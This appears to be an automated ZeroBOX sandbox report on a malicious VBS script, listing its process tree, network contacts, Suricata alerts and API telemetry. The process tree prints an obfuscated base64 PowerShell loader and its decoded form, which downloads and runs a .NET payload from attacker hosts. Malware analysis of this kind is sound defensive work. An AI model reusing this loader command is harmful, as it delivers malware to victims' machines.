Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 7, 2023, 9:19 a.m.	July 7, 2023, 9:21 a.m.

Size	319.5KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5	`236b5ad11c5fe9e980c9560f6a1254cf`
SHA256	`71d262f007e540fe2f758a038fa26c4a5379d1e28724c43ca39021a9ceed4bca`
CRC32	`7FDCD89B`
ssdeep	`192:nAP0DbkOBZZZCZ7tK31aIytWZai8tgh/McIU:nkOfnCfA1/yoZf8tgdMcIU`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\abnc.vbs
2648
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
  2744
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.yba/55.94.011.97//:ptth'))"
    2880
    - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      3040

Name	Response	Post-Analysis Lookup
cryptersandtools.minhacasa.tv	A 177.106.216.53	177.106.216.53

IP Address	Status	Action
164.124.101.2	Active	Moloch
177.106.216.53	Active	Moloch
79.110.49.55	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 79.110.49.55:80 -> 192.168.56.101:49166	2020425	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1	Exploit Kit Activity Detected
TCP 177.106.216.53:80 -> 192.168.56.101:49165	2029538	ET HUNTING EXE Base64 Encoded potential malware	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (17 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 7, 2023, 9:19 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 7, 2023, 9:19 a.m.			0	0
IsDebuggerPresent July 7, 2023, 9:19 a.m.			0	0
IsDebuggerPresent July 7, 2023, 9:19 a.m.			0	0
IsDebuggerPresent July 7, 2023, 9:19 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004356b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00435ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fedb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 7, 2023, 9:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ff778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 7, 2023, 9:19 a.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 7, 2023, 9:19 a.m.	stacktrace: 0x6708e4 0x670845 0x6706a1 0x670083 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x673bcd registers.esp: 3339272 registers.edi: 3339296 registers.eax: 0 registers.ebp: 3339308 registers.edx: 195 registers.ebx: 43244984 registers.esi: 43273532 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 7, 2023, 9:19 a.m.

stacktrace:

0x6708e4
0x670845
0x6706a1
0x670083
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x673bcd
registers.esp: 3339272
registers.edi: 3339296
registers.eax: 0
registers.ebp: 3339308
registers.edx: 195
registers.ebx: 43244984
registers.esi: 43273532
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://cryptersandtools.minhacasa.tv/e/e
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://79.110.49.55/aby.txt

Performs some HTTP requests (2 events)

request	GET http://cryptersandtools.minhacasa.tv/e/e
request	GET http://79.110.49.55/aby.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 327 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
